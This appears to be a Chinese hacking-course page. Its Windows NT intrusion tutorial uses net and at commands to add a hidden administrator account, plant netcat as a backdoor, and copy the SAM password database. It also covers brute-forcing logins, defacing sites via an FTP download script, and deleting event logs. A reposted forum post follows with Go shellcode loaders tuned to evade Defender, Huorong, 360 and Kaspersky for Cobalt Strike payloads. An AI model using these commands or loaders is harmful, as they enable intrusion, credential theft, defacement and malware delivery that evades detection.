之一课：远程控制之一切权限

　　第二课:远控不上线的解决方案。

　　第三课：图片木马及捆绑木马的 *** 。

　　第四课：打造之一个“钓鱼软件”。

　　第五课:反侦察破解钓鱼软件。

　　第六课： *** 简单的网页木马。

　　第七课： *** 个人的黑页网站。

　　第八课：mysql之数据库基础命令。

　　第九课：mysql之增删改查操作。

　　第十课：mysql之条件查询。

　　第十一课：phpmyadmin的使用。

　　第十二课： *** 图片上传网站。

　　第十三课：入侵图片上传网站

　　第十四课： *** 注册/登录网站

　　第十五课：入侵注册/登录网站

　　1、NET

　　只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！

　　这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1

　　net use \\127.0.0.1\ipc$ 123456 /user:hbx

　　退出的命令是

　　net use \\127.0.0.1\ipc$ /delte

　　下面的操作你必须登陆后才可以用，登陆的 *** 就在上面。

　　下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户。我们加一个heibai的用户密码为lovechina

　　net user heibai lovechina /add

　　只要显示命令成功，那么我们可以把他加入Administrator组了。

　　net localgroup Administrators heibai /add

　　这里是讲映射对方的C盘，当然其他盘也可以，只要存在就行了。我们这里把对方的C盘映射到本地的Z盘，

　　net use z:\\127.0.0.1\c$

　　net start telnet

　　这样可以打开对方的TELNET服务。

　　这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的Windows2000就是删除不了它。

　　这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！

　　net user guest lovechina

　　net命令果然强大啊！

　　2、At

　　一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？那么需要用AT命令，这里假设你已经登陆了那个服务器。你首先要得到对方的时间，

　　net time \\127.0.0.1

　　将会返回一个时间，这里假设时间为12:1，现在需要新建一个作业，其ID=1

　　at \\127.0.0.1 12:3 nc.exe

　　这里假设了一个木马，名为NC.EXE，这个东西要在对方服务器上。

　　这里介绍一下NC，NC是NETCAT的简称，为了方便输入，一般会被改名。它是一个TELNET服务，端口为99。等到了12:3就可以连接到对方的99端口，这样就给对方种下了木马。

　　3、Telnet

　　这个命令非常实用，它可以与远方做连接，不过正常下需要密码、用户，不过你给对方种了木马，直接连到这个木马打开的端口。

　　telnet 127.0.0.1 99

　　这样就可以连到对方的99端口，那你就可以在对方运行命令了，这个也就是肉鸡。

　　4、FTP

　　它可以将你的东西传到对方机子上，你可以去申请个支持FTP上传的空间，国内多的是，如果真的找不到，我给个不错的。当我们申请完后，它会给用户名，密码，以及FTP服务器。在上传前需要登陆先，这里我们假设FTP服务器是用户名是HUC *** ，密码是654321。

　　ftp

　　他会要求输入用户，成功后会要求输入密码。

　　下面先说上传，假设你需上传的文件是INDEX.HTM，它位于C:\下，传到对方D:\

　　get c:\index.htm d:\

　　假设你要把对方C盘下的INDEX.HTM，下到你的机子的D盘下

　　put c:\index.htm d:\

　　5、Copy

　　下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好IPC$连接才有效。这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下

　　copy index.htm \\127.0.0.1\c$\index.htm

　　如果你要复制到D盘下把C改为D，就行了！

　　如果你要把他复制到WINNT目录里，就要把输入

　　copy index.htm \\127.0.0.1\admin$\index.htm

　　admin$是winnt

　　要把对方的文件复制过来，顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名。下面就把127.0.0.1的数据库复制到本地C盘下

　　copy \\127.0.0.1\admin$\repair\sam._ c:\

　　6、Set

　　如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用SET命令！下面是我得到的结果！我来分析它，只是找主页在那而已。

　　COMPUTERNAME=PENTIUMII

　　ComSpec=D:\WINNT\system32\cmd.exe

　　CONTENT_LENGTH=0

　　GATEWAY_INTERFACE=CGI/1.1

　　HTTP_ACCEPT=*/*

　　HTTP_ACCEPT_LANGUAGE=zh-cn

　　HTTP_CONNECTION=Keep-Alive

　　HTTP_HOST=当前登陆者的IP，这里本来是显示我的IP，被我删除了

　　HTTP_ACCEPT_ENCODING=gzip， deflate

　　HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)

　　NUMBER_OF_PROCESSORS=1

　　Os2LibPath=D:\WINNT\system32\os2\dll;

　　OS=Windows_NT

　　Path=D:\WINNT\system32;D:\WINNT

　　PATHEXT=.COM;.EXE;.BAT;.CMD

　　PATH_TRANSLATED=E:\vlroot主页放在的地址，只要你看到PATH_TRANSLATED=的后面就是主页的存放地

　　址。这里是E:\vlroot

　　PROCESSOR_ARCHITECTURE=x86

　　PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3， GenuineIntel

　　PROCESSOR_LEVEL=6

　　PROCESSOR_REVISION=0303

　　PROMPT=$P$G

　　QUERY_STRING=/c+set

　　REMOTE_ADDR=XX.XX.XX.XX

　　REMOTE_HOST=XX.XX.XX.XX

　　REQUEST_METHOD=GET

　　SCRIPT_NAME=/scripts/..%2

　　SERVER_NAME=XX.XX.XX.XX

　　SERVER_PORT=80

　　SERVER_PORT_SECURE=0

　　SERVER_PROTOCOL=HTTP/1.1

　　SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0

　　SystemDrive=D:

　　SystemRoot=D:\WINNT

　　TZ=GMT-9

　　USERPROFILE=D:\WINNT\Profiles\Default User

　　windir=D:\WINNT

　　粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用这个 *** 才能100%的找到主页的名称，当你DIR这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名，这样只要看到和XX.XX.XX.XX看到的也面一模一样，那么这就是主页的名称了。

　　7、Nbtstat

　　如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就要用这个命令得到用户了。顺便告诉大家这是netbios，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！

　　现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。命令是

　　nbtstat -A XX.XX.XX.XX

　　-A一定要大写哦，下面是得到的结果。

　　NetBIOS Remote Machine Name Table

　　Name Type Status

　　---------------------------------------------

　　Registered Registered Registered Registered Registered Registered Registered Reg

　　istered Registered Registered Registered

　　MAC Address=00-E0-29-14-35-BA

　　PENTIUMII UNIQUE

　　PENTIUMII UNIQUE

　　ORAHOTOWN GROUP

　　ORAHOTOWN GROUP

　　ORAHOTOWN UNIQUE

　　PENTIUMII UNIQUE

　　INet~Services GROUP

　　IS~PENTIUMII... UNIQUE

　　ORAHOTOWN GROUP

　　ORAHOTOWN UNIQUE

　　..__MSBROWSE__. GROUP

　　粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是不是看到了一窜数字，只要这窜数字是的话，那他前面的就是用户，这里的用户是PENTIUMII。

　　8、Shutdown

　　关了对方的NT服务器的命令

　　Shutdown \\IP地址 t:20

　　20秒后将NT自动关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。

　　9、DIR

　　这个命令没什么好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。你可以本地试下。

　　10、Echo

　　著名的漏洞Unicode，这个命令可以简单的黑一下有这个漏洞的主机。我们假设我们要把“南京大屠杀铁证如山，任何***人不得抵赖！”写入index.htm，有2种 *** ，大家看看有什么区别。

　　echo 南京大屠杀铁证如山，任何***人不得抵赖！>index.htm

　　echo 南京大屠杀铁证如山，任何***人不得抵赖！>>index.htm

　　之一个的意思是覆盖index.htm原有的内容，把“南京大屠杀铁证如山，任何***人不得抵赖！”写进index.htm；第二个的意思是把“南京大屠杀铁证如山，任何***人不得抵赖！”加到index.htm里面。

　　“>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。大家可以本地试下。

　　可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页到对方的目录里。

　　(1)首先，我们需要申请一个免费的主页空间。

　　(2)用echo在可写目录下建立如下内容的txt文件：（以chinren服务器为例。）

　　open upload.chinaren.com（你的FTP服务器，申请时你的空间提供商会给你的）

　　cnhack（你申请时的用户名）

　　test（你申请时的密码）

　　get index.htm c:\inetpub\wwwroot\index.htm

　　（这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm）

　　bye（退出FTP对话，相当在98下的DOS，用EXIT退出DOS）

　　具体的做法：

　　输入 echo open upload.chinaren.com> c:\cnhack.txt

　　输入 echo cnhack >> c:\cnhack.txt

　　输入 echo 39abs >> c:\cnhack.txt

　　输入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt

　　最后输入 ftp -s:c:\cnhack.txt （利用ftp的-s参数，执行文件里的内容。）等命令完成时，文件已经下载到你指定的文件里了。

　　注意：取得文件后，请删除cnhack.txt。（如果不删除，很容易会给别人看到你的密码。） 记得要 del c:\cnhack.txt。

　　11、Attrib

　　这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。不过有这个命令就别怕了。

　　attrib -r index.htm

　　这个命令是把index.htm的只读属性去掉。如果把“-”改为“+”则是把这个文件的属性设置为只读。

　　attrib +r index.htm

　　这个命令是把index.htm的属性设置为只读。

　　12、Del

　　当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日志，当然要删除日志啦！想被捉吗，呵呵。NT的日志有这些

　　del C:\winnt\system32\logfiles\*.*

　　del C:\winnt\ssytem32\config\*.evt

　　del C:\winnt\system32\dtclog\*.*

　　del C:\winnt\system32\*.log

　　del C:\winnt\system32\*.txt

　　del C:\winnt\*.txt

　　del C:\winnt\*.log

　　只要删除这些就可以了，有些系统NT安装在D盘或其他盘，就要把C改成其他盘。

　　转：

　　之前弟弟写了个免杀入门水文，确实是真的浅显，水的很

　　算是零基础的可以看看作为了解吧

　　骗了那么多赞，感觉良心发现了？(才没有，其实是别有原因)

　　这次实实在在写一个吧（弟弟自己还得留几个救急用）

　　能过微软自带def，火绒，卡巴这些！

　　靶机：IP：192.168.111.10杀软：火绒，360，卡巴，微软def

　　本机：IP：192.168.111.11安装环境：cobaltstrike，go环境

　　由于本人很久之前就安装了，所以直接上菜鸟教程吧

　　

　　主要是内存加载，对shellcode预先编码，然后解码执行。

　　因为不是每个人每种语言都精通

　　但是当我们有需要了的时候怎么办？

　　骚骑弟弟的 *** 就是找个案例

　　然后将不懂的函数查清楚

　　进而开始针对个人想要的功能进行修改或者拓展

　　用重剑无锋大佬的文章中的案例做个示范：

　　远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)

　　package main

　　import (

　　"io/ioutil"

　　"os"

　　"syscall"

　　"unsafe"

　　)

　　const (

　　MEM_COMMIT=0x1000

　　MEM_RESERVE=0x2000

　　PAGE_EXECUTE_READWRITE=0x40

　　)

　　var (

　　kernel32=syscall.MustLoadDLL("kernel32.dll")

　　ntdll=syscall.MustLoadDLL("ntdll.dll")

　　VirtualAlloc=kernel32.MustFindProc("VirtualAlloc")

　　RtlCopyMemory=ntdll.MustFindProc("RtlCopyMemory")

　　shellcode_buf=[]byte{

　　0xfc, 0x48, ----shellcode----, 0xd5,

　　}

　　)

　　func checkErr(err error) {

　　if err !=nil {

　　if err.Error() !="The operation completed successfully." {

　　println(err.Error())

　　os.Exit(1)

　　}

　　}

　　}

　　func main() {

　　shellcode :=shellcode_buf

　　if len(os.Args) > 1 {

　　shellcodeFileData, err :=ioutil.ReadFile(os.Args[1])

　　checkErr(err)

　　shellcode=shellcodeFileData

　　}

　　addr, _, err :=VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)

　　if addr==0 {

　　checkErr(err)

　　}

　　_, _, err=RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))

　　checkErr(err)

　　syscall.Syscall(addr, 0, 0, 0, 0)

　　}

　　在原本的文章中，是可以免杀的，但由于过了很长时间，因此现在已经凉了。当然我们对这些不能抱多大希望，终归只是学习姿势，拓展思路，因为可能换个方式就可以了，例如我们这样实现：

　　package main

　　import (

　　"os"

　　"syscall"

　　"unsafe"

　　"encoding/hex"

　　)

　　const (

　　MEM_COMMIT=0x1000

　　MEM_RESERVE=0x2000

　　PAGE_EXECUTE_READWRITE=0x40

　　)

　　var (

　　kernel32=syscall.MustLoadDLL("kernel32.dll")

　　ntdll=syscall.MustLoadDLL("ntdll.dll")

　　VirtualAlloc=kernel32.MustFindProc("VirtualAlloc")

　　RtlCopyMemory=ntdll.MustFindProc("RtlCopyMemory")

　　shellcodes="--shellcode--"

　　)

　　func checkErr(err error) {

　　if err !=nil {

　　if err.Error() !="The operation completed successfully." {

　　println(err.Error())

　　os.Exit(1)

　　}

　　}

　　}

　　func main() {

　　var shellcode []byte

　　shellcode, _=hex.DecodeString(shellcodes)

　　addr, _, err :=VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)

　　if addr==0 {

　　checkErr(err)

　　}

　　_, _, err=RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))

　　checkErr(err)

　　syscall.Syscall(addr, 0, 0, 0, 0)

　　}

　　做的改变就是将本地镶嵌的shellcode换成了hex编码

　　如图1：

　　是不是感觉很简单？为啥自己没想到？先将go文件生成exe进行杀软检测吧。

　　执行命令：

　　go build -ldflags=”-H windowsgui” youer_filename

　　免杀及上线情况如图3，4

　　有时候很多事情并不是想象中的那么难，就看能不能绕过那个弯，用hack的思维去考虑问题（话说我现在都不会和 *** 姐交流了，上周末出去玩都尬死了）。

　　上面的算是抛砖引玉吧，然后卡巴还没过去

　　还有个思路的

　　那就是测试源来的shellcode哪些连用他会出问题

　　测试结果是：

　　当在如图5中所示地点断开，火绒停止爆错。

　　因此，我又开始琢磨了

　　是否可以在这里输入没用的字符

　　然后在在做下替换可行不

　　替换代码如下：

　　var contents="shellcode"

　　shellcodes, _ :=regexp.Compile("xxxxx");

　　shellcod :=shellcodes.ReplaceAllString(contents, "xx")

　　大概思路就是讲爆错位置加入特定字符，然后利用正则识别(xxxxx)，替换成想要的内容（xx）感觉思路是没问题的，而且测试输出的内容也是一样的。但是就是不能运行，所以如果有熟悉go的希望能指教下弟弟。

　　针对反沙盒静态免杀，混淆函数免杀

　　针对静态免杀我们可以增加些判断

　　诸如主机名，计算机名这些

　　再有就是设置sleep这些，对于go基础为0的和我一样的

　　推荐直接用veil生成go文件，然后自己对其进行简单的改编。

　　利用上述做免杀结果

　　留一手当然还有几个思路，弟弟自己留一手，然后继续学习

　　后续会考虑更新更详细一些，期待不断成长不再水文章！

　　总体来说，就一个问题，多看，多想，遇到问题不要慌，换个思路拐个弯做下尝试。

　　然后这两个我都没上传样本，基本上是断网情况测试

　　因此免杀效果应该是可以维持一段时间的

　　免杀是在不断对抗过程中成长的，勤思考多查找，总会有办法的。

　　感谢社区学员骚骑的文章分享！安全社区是一群学员集结的地方！

　　每日都有来自不同学生的干货，经验，技术文等自身经验分享

　　不仅可以交流学习，还能赚取收益！

　　有兴趣的小伙伴可以咨询助教！领取社区权限！

　　 *** 黑客视频录播教程+靶场链接+工具！

　　扫码免费获取